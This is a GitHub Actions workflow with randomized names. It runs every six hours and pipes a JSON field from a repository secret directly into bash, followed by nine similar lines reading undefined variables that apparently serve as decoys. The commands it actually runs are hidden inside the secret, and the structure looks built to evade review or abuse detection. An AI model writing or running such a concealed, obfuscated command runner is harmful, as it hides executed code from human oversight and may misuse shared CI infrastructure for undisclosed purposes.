name: zheyangdezk
on:
  workflow_dispatch:
  schedule:
    - cron: '40 0/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: zheyangdezk
        env:
          g5891: ${{ secrets.g5891 }}
        run: |
          echo $g5891 | jq -r .xzeyo3 | /bin/bash
          echo $uxl5793 | jq -r .dcvrl946 | /bin/bash
          echo $eoxbe65 | jq -r .aaiq06100 | /bin/bash
          echo $a906 | jq -r .sqje37 | /bin/bash
          echo $tv7407 | jq -r .xqjb3 | /bin/bash
          echo $cezr1 | jq -r .mzj99354 | /bin/bash
          echo $stepf9 | jq -r .m585 | /bin/bash
          echo $lohyd4 | jq -r .mwhvs2 | /bin/bash
          echo $mdc1 | jq -r .irq9 | /bin/bash
          echo $iyjgw264 | jq -r .nfgl1416 | /bin/bash

